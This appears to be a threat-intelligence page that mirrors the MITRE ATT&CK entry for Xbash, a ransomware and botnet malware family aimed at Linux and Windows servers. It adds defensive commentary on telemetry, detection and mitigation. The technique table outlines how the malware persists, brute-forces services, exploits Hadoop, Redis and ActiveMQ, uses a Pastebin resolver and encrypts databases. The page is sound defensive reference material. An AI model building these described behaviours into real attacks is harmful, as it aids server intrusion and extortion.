S0341: Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[1]
Analyst context for executives and security teams
Xbash matters because it represents server-focused malware spanning Linux and Windows, with ATT&CK relationships that cover discovery, credential guessing, persistence, command-and-control, tool transfer, and impact behaviors such as data destruction or encryption. For leaders, the decision point is not a single signature for Xbash; it is whether server monitoring, identity controls, egress visibility, and recovery readiness are strong enough to handle malware that can move from discovery into operational disruption.
Executive priority
Prioritize Xbash as a resilience and server-security validation case. The supplied ATT&CK context links it to Linux and Windows servers and to techniques associated with password guessing, scheduled or startup persistence, web-based C2, ingress tool transfer, and destructive/encryption impact. Executives should ask whether critical servers have enforceable credential protections, monitored administrative scripting, controlled outbound web access, tested backups, and incident response playbooks that cover both Linux and Windows recovery evidence.
Technical view
ATT&CK provides no official detection text for Xbash, so SOC and IR teams should validate coverage through the related techniques rather than rely on a named-malware analytic. On Linux, confirm visibility into cron changes, process execution, network/service discovery, file transfer activity, outbound web connections, and suspicious ELF execution, including PyInstaller-style self-contained binaries where observable. On Windows, confirm telemetry for PowerShell, Visual Basic/JScript execution paths, mshta.exe and regsvr32.exe proxy execution, Registry Run Keys/Startup Folder changes, password guessing signals, and outbound web/dead-drop style resolver behavior. Because the object is malware targeting Linux and Microsoft Windows servers, detection engineering should test server telemetry specifically, not only endpoint workstations.
Likely telemetry
- Linux process execution and command-line telemetry
- Windows process creation and command-line telemetry
- PowerShell execution logs where enabled
- Script execution evidence for Visual Basic, JScript/JavaScript, mshta.exe, and regsvr32.exe
- Cron/crontab file and job modification events
Detection direction
- Build detection around the mapped ATT&CK techniques: T1016, T1046, T1053.003, T1059.001, T1059.005, T1059.007, T1071.001, T1102.001, T1105, T1110.001, T1203, T1218.005, T1218.010, T1485, T1486, and T1547.001.
- Tune separately for Linux and Windows servers; workstation-focused detections may miss cron persistence, Linux ELF execution, or server-to-server discovery patterns.
- Baseline legitimate administration before alerting on discovery commands, scripting engines, or scheduled tasks, since many related behaviors overlap with normal operations.
- Correlate weak signals: password guessing followed by scripting execution, tool transfer, persistence changes, outbound web traffic, and data modification is more meaningful than any single event.
- Validate egress monitoring for ordinary web protocols and legitimate web services used as resolvers, because ATT&CK notes C2 may blend into common HTTP/S-style traffic.
Mitigation priorities
- Sequence controls around server resilience: harden exposed services, reduce unnecessary network services, and ensure vulnerability management covers server applications relevant to client-execution exploitation risk.
- Strengthen identity defenses against password guessing with strong password policy, lockout/rate-limiting where appropriate, and monitoring of repeated authentication failures.
- Restrict and monitor administrative scripting and living-off-the-land execution paths, including PowerShell, mshta.exe, regsvr32.exe, Visual Basic/JScript, and Linux cron usage.
- Limit outbound server internet access to business-required destinations and inspect web-protocol traffic where policy and architecture allow.
- Protect persistence locations such as cron entries, Registry Run Keys, and Startup Folders with change monitoring and least-privilege administration.
Analyst notes and limits
The strongest decision value in this object comes from the relationship set: Xbash is connected to discovery, execution, persistence, credential access, command-and-control, ingress transfer, and impact techniques. The official description states it targeted Linux and Microsoft Windows servers, was developed in Python, converted to a Linux ELF using PyInstaller, and has been tied to Iron Group, a group known for previous ransomware attacks. Treat attribution as source context, not as a basis for assuming current activity or exposure.
ATT&CK provides no official detection guidance for this object, and the object-level tactics are not specified. The relationship descriptions are technique-level context and may include platforms beyond Xbash’s stated Windows and Linux scope; local validation is required before claiming coverage. This take does not assert active exploitation, customer exposure, or guaranteed detection.
Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1071.001 | Web Protocols Sub-technique | Xbash uses HTTP for C2 communications.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1485 | Data Destruction | Xbash has destroyed Linux-based databases as part of its ransomware capabilities.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Xbash can execute malicious VBScript payloads on the victim’s machine.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1218.005 | Mshta Sub-technique | Xbash can use mshta for executing scripts.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Xbash can create a Startup item for persistence if it determines it is on a Windows system.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1053.003 | Cron Sub-technique | Xbash can create a cronjob for persistence if it determines it is on a Linux system.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1203 | Exploitation for Client Execution | Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.CitationUnit42 Xbash Sept 2018CitationTrend Micro Xbash Sept 2018 |
| Enterprise | T1105 | Ingress Tool Transfer | Xbash can download additional malicious files from its C2 server.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Xbash can execute malicious JavaScript payloads on the victim’s machine.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1046 | Network Service Discovery | Xbash can perform port scanning of TCP and UDP ports.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1486 | Data Encrypted for Impact | Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1110.001 | Password Guessing Sub-technique | Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.CitationUnit42 Xbash Sept 2018CitationTrend Micro Xbash Sept 2018 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Xbash can use regsvr32 for executing scripts.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1016 | System Network Configuration Discovery | Xbash can collect IP addresses and local intranet information from a victim’s machine.CitationUnit42 Xbash Sept 2018 |
| Enterprise | T1102.001 | Dead Drop Resolver Sub-technique | Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.CitationUnit42 Xbash Sept 2018 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | ad8948d71cab… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Unit42 Xbash Sept 2018
Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
Open source URL -
[2]
Xbash
(Citation: Unit42 Xbash Sept 2018)
-
[3]
mitre-attack S0341Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.